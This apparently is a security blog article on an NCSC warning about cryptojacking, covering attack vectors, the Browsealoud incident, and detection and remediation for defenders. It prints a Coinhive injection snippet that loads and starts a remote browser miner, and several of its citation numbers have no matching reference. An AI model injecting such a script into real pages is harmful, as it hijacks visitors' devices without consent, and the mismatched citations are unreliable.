The National Cyber Security Centre (NCSC) has issued a warning about the increasing use of malicious software to illegally mine cryptocurrency. This practice, known as cryptojacking, involves hijacking the processing power of unsuspecting users’ devices to mine digital currencies like Monero or Bitcoin. The NCSC’s guidance targets members of the public, website administrators, and JavaScript developers, urging them to take proactive measures to mitigate risks[1].
Key Points
- Cryptojacking involves using malicious software to mine cryptocurrency on victims’ devices without their consent.
- The NCSC has issued guidance for the public, website administrators, and developers to combat this threat.
- Attackers often exploit vulnerabilities in websites, plugins, or JavaScript to deploy cryptojacking scripts.
- Affected devices may experience degraded performance, increased power consumption, and potential hardware damage.
- Red Teams, Blue Teams, and SOC analysts should focus on detecting and mitigating cryptojacking activity through monitoring and patching vulnerabilities.
What is Cryptojacking?
Cryptojacking is a form of cyberattack where malicious actors exploit vulnerabilities in websites, software, or operating systems to install cryptomining scripts on victims’ devices. These scripts use the device’s processing power to solve complex mathematical problems, generating cryptocurrency for the attackers[10]. Unlike ransomware or data theft, cryptojacking often goes unnoticed, as it does not directly harm the victim’s data but can severely degrade system performance.
How Cryptojacking Works
- Exploitation of Vulnerabilities: Attackers target vulnerabilities in web plugins, JavaScript libraries, or server-side applications to inject cryptomining scripts.
- Browser-Based Attacks: Malicious JavaScript code embedded in websites can mine cryptocurrency using the visitor’s browser.
- Persistent Attacks: Some cryptojacking malware remains active even after the user leaves the infected site, continuing to mine cryptocurrency in the background[10].
Technical Details: How Cryptojacking is Deployed
Common Attack Vectors
- Compromised Plugins: In 2018, attackers exploited a popular accessibility plugin called Browsealoud, affecting over 4,000 websites, including government portals[5].
- JavaScript Injection: Malicious actors inject cryptomining scripts into websites, often leveraging third-party libraries or ad networks.
- Malware Distribution: Cryptojacking malware can be distributed through weaponized mobile apps, botnets, or social engineering tactics[10].
Example: Coinhive Script
One of the most notorious cryptojacking scripts is Coinhive, which mines Monero using the victim’s CPU. Below is an example of how such a script might be injected into a website:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('YOUR_MONERO_WALLET');
miner.start();
</script>This script, when embedded in a website, silently mines Monero using the visitor’s processing power.
Relevance to Red Teams, Blue Teams, and SOC Analysts
For Red Teams
- Simulate Cryptojacking Attacks: Red Teams can use tools like BeEF (Browser Exploitation Framework) to simulate cryptojacking attacks and test organizational defenses.
- Exploit Vulnerabilities: Test for vulnerabilities in third-party plugins and JavaScript libraries that could be exploited for cryptojacking.
For Blue Teams and SOC Analysts
- Monitor CPU Usage: Unusual spikes in CPU usage on endpoints or servers may indicate cryptojacking activity.
- Block Known Malicious Domains: Use blocklists to prevent access to known cryptojacking domains like
coinhive.com. - Patch Vulnerabilities: Regularly update plugins, libraries, and software to mitigate exploitation risks.
Detection and Mitigation
- YARA Rules: Use YARA rules to detect cryptojacking scripts in network traffic or files.
- SIEM Alerts: Configure SIEM tools to alert on unusual CPU activity or connections to known cryptojacking domains.
- Browser Extensions: Deploy browser extensions like NoCoin to block cryptojacking scripts.
Remediation Steps
- Update Software: Ensure all plugins, libraries, and software are up to date to prevent exploitation.
- Use Antivirus Software: Deploy antivirus solutions capable of detecting cryptojacking malware.
- Monitor Network Traffic: Regularly inspect network traffic for connections to known cryptojacking domains.
- Educate Users: Train employees and users to recognize signs of cryptojacking, such as slow device performance or overheating.
- Implement Application Allowlisting: Restrict the execution of unauthorized scripts or applications on endpoints.
Conclusion
Cryptojacking represents a growing threat to both individuals and organizations, leveraging victims’ devices to generate cryptocurrency for attackers. The NCSC’s guidance highlights the importance of vigilance and proactive measures to combat this issue. For Red Teams, Blue Teams, and SOC analysts, understanding the technical mechanisms of cryptojacking and implementing robust detection and mitigation strategies is crucial.
As the value of cryptocurrencies continues to rise, so too will the incentives for malicious actors to exploit vulnerabilities for financial gain. Staying informed and prepared is the best defense against this evolving threat.
References
- National Cyber Security Centre (2024). “NCSC advice: Malicious software used to illegally mine cryptocurrency”. NCSC. Retrieved 2024.
- BBC News (2018). “Hackers hijack government websites to mine crypto-cash”. BBC. Retrieved 2024.
- CISA (2024). “Defending Against Illicit Cryptocurrency Mining Activity”. CISA. Retrieved 2024.
